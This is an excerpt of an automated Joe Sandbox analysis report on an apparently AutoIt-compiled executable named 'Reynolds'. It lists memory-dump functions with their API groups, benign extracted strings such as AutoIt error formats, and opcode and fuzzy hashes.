                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Global$File$CloseCreateHandleObject$#418AllocCopyDeleteFreeImageLockMessageReadSendSizeStreamUnlock
                                                                                                      • String ID:
                                                                                                      • API String ID: 2779716855-0
                                                                                                      • Opcode ID: 5ce09494ab24ac1ed07fa16ca7819eb05e9d682ed7dc52cd5bd0682f6ced3240
                                                                                                      • Instruction ID: ca214fdb65b496d7a0970cd64b2816caead94f1c697383f930a2d75e9c4ef87d
                                                                                                      • Opcode Fuzzy Hash: 5ce09494ab24ac1ed07fa16ca7819eb05e9d682ed7dc52cd5bd0682f6ced3240
                                                                                                      • Instruction Fuzzy Hash: B0516876B0AB41EAFB55DF62E804A6973B0FB88B98B914175DE1E03B24DF39D406C710
                                                                                                      Function 00007FF7AA1715FC Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 388COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                      • API String ID: 0-3931177956
                                                                                                      • Opcode ID: 38560f2f3fa774d15aa6a8c65f2969727263349bd26c7da2756ce7c29d18a3b4
                                                                                                      • Instruction ID: 99f568fdb3047ec0cdfa145bcb3fbed9e6c3c87f406ca294fc7747566492b0d7
                                                                                                      • Opcode Fuzzy Hash: 38560f2f3fa774d15aa6a8c65f2969727263349bd26c7da2756ce7c29d18a3b4
                                                                                                      • Instruction Fuzzy Hash: 8C026372A0A602E5F65BAB25E15417CA370EF44B40F8B5179CA4E076B4FF2CE952CB60
                                                                                                      Function 00007FF7AA15B6A8 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 117COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: NULL Pointer assignment
                                                                                                      • API String ID: 0-2785691316
                                                                                                      • Opcode ID: 3cbbc719979583f5783d410f4d2771c0b32c38c29e3e03eccb0298c3601c94f3
                                                                                                      • Instruction ID: 1160cd3bce95250d66728718b61fa77b68f653d663362407d1689a224d96534c
                                                                                                      • Opcode Fuzzy Hash: 3cbbc719979583f5783d410f4d2771c0b32c38c29e3e03eccb0298c3601c94f3
                                                                                                      • Instruction Fuzzy Hash: 27518772B1AA22E9FB01EF25E8806BC7770FB84B98F825075DA0E47665DF38D046C310
                                                                                                      Function 000002453CA290A0 Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 222COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: o$o$o$o$o$o
                                                                                                      • API String ID: 0-2858737866
                                                                                                      • Opcode ID: 7429022ef66a0fdcf71f43fdf757cbd27632989c6b60b8a8682d95a3e33e1cc1
                                                                                                      • Instruction ID: 5c9a5586a7d67038e84590b691d84d2ddd135e7006194934162ab5465de8c4d6
                                                                                                      • Opcode Fuzzy Hash: 7429022ef66a0fdcf71f43fdf757cbd27632989c6b60b8a8682d95a3e33e1cc1
                                                                                                      • Instruction Fuzzy Hash: FC81F323A08AB087F77A8E36A18D76A7ED1A718BE0F145255DFE756AD3D238D4C1C700
                                                                                                      Function 00007FF7AA16AA78 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 188windowsleepCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                      • String ID: P
                                                                                                      • API String ID: 1460738036-3110715001
                                                                                                      • Opcode ID: bc901e50a334b4a7c78d094858a5c527965ee132f71a92aa0f5dc32a9aa332c1
                                                                                                      • Instruction ID: cb0d86327c9e1f2d4826e149adf746b0fe0e1a2e7cc59c5bb8d248cfa76e6f81
                                                                                                      • Opcode Fuzzy Hash: bc901e50a334b4a7c78d094858a5c527965ee132f71a92aa0f5dc32a9aa332c1
                                                                                                      • Instruction Fuzzy Hash: 8871E526A0E542E6F722EF20F4502BDA772BB44788FD640B5CA4E476A1CE7CE547D321
                                                                                                      Function 00007FF7AA173C14 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 135COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LoadStringwprintf
                                                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                      • API String ID: 3297454147-3080491070
                                                                                                      • Opcode ID: b1c87d20e2fab5ea52848e67197744439dd02fd7dad917650ee75d30fdaea2ed
                                                                                                      • Instruction ID: 7234255a1c247aad23df45773486cfbfc4df2afe2c131d43b0476c357b464819
                                                                                                      • Opcode Fuzzy Hash: b1c87d20e2fab5ea52848e67197744439dd02fd7dad917650ee75d30fdaea2ed
                                                                                                      • Instruction Fuzzy Hash: 80614E22A1AA53E6FB11EB24E4805EDA371FB80744FC110B2EA4D576A9DF3CD51BCB50
                                                                                                      Function 00007FF7AA167A88 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 128windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleLoadModuleString$Messagewprintf
                                                                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                      • API String ID: 4051287042-2268648507
                                                                                                      • Opcode ID: 62d3efdd22561061cae8cb835c91bde9e20e159738d326f93298747da2c55c00
                                                                                                      • Instruction ID: d2878fa58fb6d18b836c517ce64a2b10f24e94684e37d01d65efb2bc71751dbc
                                                                                                      • Opcode Fuzzy Hash: 62d3efdd22561061cae8cb835c91bde9e20e159738d326f93298747da2c55c00
                                                                                                      • Instruction Fuzzy Hash: 3D516022A19A53E1FA01FB64F8814AEA371FF90754BC200B2EA0D576A9DF7CD51BC750
                                                                                                      Function 00007FF7AA0F15EC Relevance: 18.2, APIs: 12, Instructions: 191timeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Destroy$AcceleratorKillTableTimerWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 1974058525-0
                                                                                                      • Opcode ID: c5a335280972faf6a49444eab98031eca0eed2acb66a1a220016335a9642b9bc
                                                                                                      • Instruction ID: 664a8c775973d628e4fc411124c24640358b7ff34487aa149716a63d1bde3306
                                                                                                      • Opcode Fuzzy Hash: c5a335280972faf6a49444eab98031eca0eed2acb66a1a220016335a9642b9bc
                                                                                                      • Instruction Fuzzy Hash: A3917C22A0B603D1FB65AF15E890279B370BF94B94FCA01B5CA0E57274EE3DE4528320
                                                                                                      Function 000002453CA22200 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 169COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: iswctype
                                                                                                      • String ID: 0$0
                                                                                                      • API String ID: 304682654-203156872
                                                                                                      • Opcode ID: 382810b75dffc56fad28a097d5aef162bfb12b4ad378d10f03c6db3b2c66eacb
                                                                                                      • Instruction ID: 105dd0fd2e223fa4ea19edca0b5027cf66fd02e3c126ffe39006adcf81dd89d1
                                                                                                      • Opcode Fuzzy Hash: 382810b75dffc56fad28a097d5aef162bfb12b4ad378d10f03c6db3b2c66eacb
                                                                                                      • Instruction Fuzzy Hash: 2F514663710C3543FB2E5FA584283BE2991AB947F4F0643A5E9E7067C6EA79D8C1D300
                                                                                                      Function 00007FF7AA0F1504 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 167windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                      • String ID: P
                                                                                                      • API String ID: 1268354404-3110715001
                                                                                                      • Opcode ID: 65985f514fe282cf7fc84508a366ad01552345b2107e3be222cdfd0a1f15b60d
                                                                                                      • Instruction ID: 5c2ea81abad507b43548748dee8bf9ef1e44b092ca2365717628c4d73227ef4f
                                                                                                      • Opcode Fuzzy Hash: 65985f514fe282cf7fc84508a366ad01552345b2107e3be222cdfd0a1f15b60d
                                                                                                      • Instruction Fuzzy Hash: ED61D332E0A603D6FB55AF25E490679A761FB84B98F950175DE0E437B4EF3CE4428720
                                                                                                      Function 00007FF7AA173E90 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 149COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LoadStringwprintf
                                                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                      • API String ID: 3297454147-2391861430
                                                                                                      • Opcode ID: 4b4e83561d4c394d035cfda00e0b77968df2470a98dc572cfda11644b6d54e6e
                                                                                                      • Instruction ID: 4ddb26ba643edbf3699063aadead2cb9674fd1b08153b116d270ad989f6fff5c
                                                                                                      • Opcode Fuzzy Hash: 4b4e83561d4c394d035cfda00e0b77968df2470a98dc572cfda11644b6d54e6e
                                                                                                      • Instruction Fuzzy Hash: 7B715F22A1AA53E6FA01EB65E4804EEA331FB40744FC11072EA4D576A9DE7CE51BCB50
                                                                                                      Function 00007FF7AA19B590 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$CreateMessageObjectSend$AttributesCompatibleDeleteDestroyLayeredLongMovePixelSelectStock
                                                                                                      • String ID: static
                                                                                                      • API String ID: 3821898125-2160076837
                                                                                                      • Opcode ID: c03bc4cbd0e80d437ddc16db197f3997b0fadd0aa29a366dc6835b7237bf8b41
                                                                                                      • Instruction ID: 225a7e66c050d33f46f2490f4d33f29fe436d863d49c17e322498d2fcd18cd3f
                                                                                                      • Opcode Fuzzy Hash: c03bc4cbd0e80d437ddc16db197f3997b0fadd0aa29a366dc6835b7237bf8b41
                                                                                                      • Instruction Fuzzy Hash: 95416B76609781D6E7609F25F444B5AB3B1FB887A4F904239EA9D43BA8CF3CD446CB10
                                                                                                      Function 000002453CA278D0 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 391COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: fputc
                                                                                                      • String ID: .
                                                                                                      • API String ID: 1992160199-248832578
                                                                                                      • Opcode ID: c4fd1d169cc7f56a6e158dfc545df6c3e67e03bb9423ad188e40c43d19d083b1
                                                                                                      • Instruction ID: 53737c25c876262985badfb70b982c758906235772a649780dae8bf224450139
                                                                                                      • Opcode Fuzzy Hash: c4fd1d169cc7f56a6e158dfc545df6c3e67e03bb9423ad188e40c43d19d083b1
                                                                                                      • Instruction Fuzzy Hash: FBF18F73205AB08BF77A8E16E09873E7BB1E754792F409155CBD786A83D728DAC1CB00
                                                                                                      Function 00007FF7AA0F4B64 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 178registryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: NameQueryValuewcscat$CloseFileFullModuleOpenPath
                                                                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\Include\
                                                                                                      • API String ID: 2667193904-1575078665
                                                                                                      • Opcode ID: 62e5a476b600ec05f0d2790c9d0efbf7d7efba7b32e8e3b7640c97021270d09d
                                                                                                      • Instruction ID: 3c66996c38ec7cb0d156cc4a4abc8f0374d73e2c872e112b87876628407fec57
                                                                                                      • Opcode Fuzzy Hash: 62e5a476b600ec05f0d2790c9d0efbf7d7efba7b32e8e3b7640c97021270d09d
                                                                                                      • Instruction Fuzzy Hash: F7918122A1A643E1FA21AB20F8901BEA374FF94744FC24276E54D47AB5EF7CD106C720
                                                                                                      Function 000002453CA28B20 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 159stringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: fwprintf$fputwcstrlen
                                                                                                      • String ID: %*.*S$%-*.*S$%.*S
                                                                                                      • API String ID: 3854221471-2115465065
                                                                                                      • Opcode ID: 56140c876fb969847345c145ef6a243794b44e3509e9b32e237d78c2add8918c
                                                                                                      • Instruction ID: 9d223131524db8b5f870e3a96c361c8adbff07a8562ceb33ebdb02d1a7810c25
                                                                                                      • Opcode Fuzzy Hash: 56140c876fb969847345c145ef6a243794b44e3509e9b32e237d78c2add8918c
                                                                                                      • Instruction Fuzzy Hash: 02516073611A318BE77A8F16E45872A7BA1E794B90F008159EFDB87A92D73CD5C1CB00
                                                                                                      Function 00007FF7AA0F43D8 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 143windowtimeregistryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                      • String ID: TaskbarCreated
                                                                                                      • API String ID: 129472671-2362178303
                                                                                                      • Opcode ID: c8a61ef6ba8fcfb5c434e9d74e70d64f9c97e8120f793cf46b099463dba2e8ac
                                                                                                      • Instruction ID: ec37aa82eade258c17180e7a4e015ca70f449343693bea529aa469c47b056f9f
                                                                                                      • Opcode Fuzzy Hash: c8a61ef6ba8fcfb5c434e9d74e70d64f9c97e8120f793cf46b099463dba2e8ac
                                                                                                      • Instruction Fuzzy Hash: 28518032D0E643D6FA61BB14F88417EE6B1AF50740FC641B5C84E626B2EE6EF5578320
                                                                                                      Function 00007FF7AA12D394 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                                      • API String ID: 3215553584-2617248754
                                                                                                      • Opcode ID: ded73e00c8e6cc6561cc55327789767f53a96699fca3135d68715b719835a39c
                                                                                                      • Instruction ID: 83d87bdef10d772b313991e501b6e350ca24e99e7bff53a4e28cd977df528783
                                                                                                      • Opcode Fuzzy Hash: ded73e00c8e6cc6561cc55327789767f53a96699fca3135d68715b719835a39c
                                                                                                      • Instruction Fuzzy Hash: 8441AC72A0AB51D9FB11DB24F8417A973B4EB04398F824576EE5C07BA4DE3CD02AC350
                                                                                                      Function 00007FF7AA167CB0 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 77windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(00000001,00007FF7AA13BC28,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00007FF7AA0F475D), ref: 00007FF7AA167CE6
                                                                                                      • LoadStringW.USER32(?,?,?,?,?,?,?,?,00000000,?,?,?,?,00007FF7AA0F475D,?,00007FF7AA0F3C00), ref: 00007FF7AA167D00
